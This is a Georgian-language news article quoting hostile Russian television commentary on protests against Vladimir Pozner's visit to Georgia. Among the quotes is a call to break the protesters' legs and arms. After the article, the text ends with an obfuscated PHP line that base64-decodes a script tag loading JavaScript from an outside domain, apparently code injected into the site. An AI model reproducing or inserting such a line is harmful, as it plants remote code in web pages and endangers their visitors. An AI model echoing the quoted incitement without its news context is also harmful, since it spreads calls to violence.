celsiusi
ავერსი საქკაბელი
"ასეთი ქეყნები არ უნდა არსებობდნენ" და "ირაკლი II თავად ითხოვა რუსეთის შემადგენლობაში შესვლას", ასეთი კომენტარები გაკეთდა რუსეთის პირველ არხზე, გადაცემა "ვრემია პოკაჟეტში" ვლადიმირ პოზნერის საქართველოში ვიზიტის შესახებ საუბრისას. გადაცემის წამყვანი და სტუმრები საკმაოდ აგრესიულად აფასებდნენ პოზნერის ვიზიტის გამო საქართველოში გამოხატულ პროტესტს, რომელიც მათი შეფასებით რუსოფობია იყო და განაცხადეს, რომ საქართველოში განსხვავებული აზრის გამოხატვა შეუძლებელია. 
 
საინფორმაციო სააგენტო "ბიზნესთაიმი" გთავაზობთ, გადაცემიდან რამდენიმე წიტატას: 
 
 ალექსეი ჟურავლოვი, სახელმწიფო დუმის წევრი:
 
საბჭოთა კავშირის დაშლის  შემდეგ და რაც რუსეთს დაშორდით, მას შემდეგ რა გაქვთ თავებში? რუსეთთან ერთად იყავით ხალხი, რომელსაც  შეეძლო კულტურის  ტარება, ეს არის კავკასიური სტუმართმოყვარეობა და ახლა? - ეს ხომ სამარცხვინოა!".
 
ოლესია ლოსევა, წამყვანი:
 
"როგორც სჩანს, მათ ზოგჯერ უნდა გავახსენოთ, როგორ იქცეოდნენ მათი წინაპრები, კერძოდ, ირაკლი  II 1800 წელს, როდესაც მან პავლე I- ს რუსეთის იმპერიაში შესვლა სთხოვა - ეს არის ცნობილი მანიფესტი. ზოგჯერ უნდაშევახსენოთ”.
 
სერგეი მარდანი, პუბლიცისტი, რადიოს წამყვანი:
 
”ეს მხოლოდ დადასტურებაა იმისა, რომ ზოგიერთმა ქვეყანამ არ უნდა იარსებოს. თუ მათ არა  თუ არიციან როგორ იშოვონ ფული, არამედ  გარკვეული ფულის შოვნაც კი არ სურთ, მაშინ საჭიროა მოექცნენ ვინმეს პროტექტორატის ქვეშ - რუსეთის, თურქეთის, ან ნებისმიერი ვინმეს ქვეშ. ეს არის ერთადერთი, რაც კვებავს თანამედროვე საქართველოს - ტურიზმი. რუსი ტურისტების გარეშე იქ ხალხს ფაქტიურად არაფერი აქვთ საჭმელად. იმის გათვალისწინებით, რომ ეს საპროტესტო აქცია სააკაშვილის მომხრეების მიერ იყო ორგანიზებული, ვვარაუდობ, რომ ეს კლასიკური დივერსიაა. მე ვფიქრობ, რომ ნორმალურმა ქართველებმა უნდა იპოვონ ეს "ჯენტლმენები" და დაუმტვრიონ ფეხები დ ა ხელები”.
 
ნიკიტა დანიუკი, RUDN უნივერსიტეტის სტრატეგიული კვლევებისა და პროგნოზების ინსტიტუტის დირექტორის მოადგილე, რუსეთის ფედერაციის საზოგადოებრივი პალატის წევრი:
 
”პოსტსაბჭოთა სივრცეშიც არიან ქვეყნები, სადაც შეუძლებელია ალტერნატიული მოსაზრების გამოხატვა. რაც ყველაზე საინტერესოა, ეს ის ქვეყნებია, რომლებიც, როგორც ჩანს, პირველთა შორის დაადგნენ დემოკრატიის გზას. საქართველო პირველი ქვეყანაა პოსტსაბჭოთა სივრცეში, სადაც 2003 წელს მოხდა კლასიკური ”ფერადი რევოლუცია” - ”ვარდების რევოლუცია”. მათ ისევე თქვეს, რომ არ იქნებოდა ოლიგარქები, რომ იქნებოდა სახალხო მმართველობა, ნახეთ რა ხდება საქართველოში! არც კულტურის, არც სახელმწიფოს და არც პოლიტიკური ძალების დონეზე!".
 
ანატოლი კუზიჩევი, წამყვანი:
 
"როგორ შეიძლება ამ დელიკატურ, სტუმართმოყვარე, ცხელ, მგზნებარე, ლამაზ ხალხს აეშენებინა, როგორ უნდა ვთქვა ეს უფრო დელიკატურად, დაკომპლექსებული სახელმწიფო?!"
 
 
 
9994
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");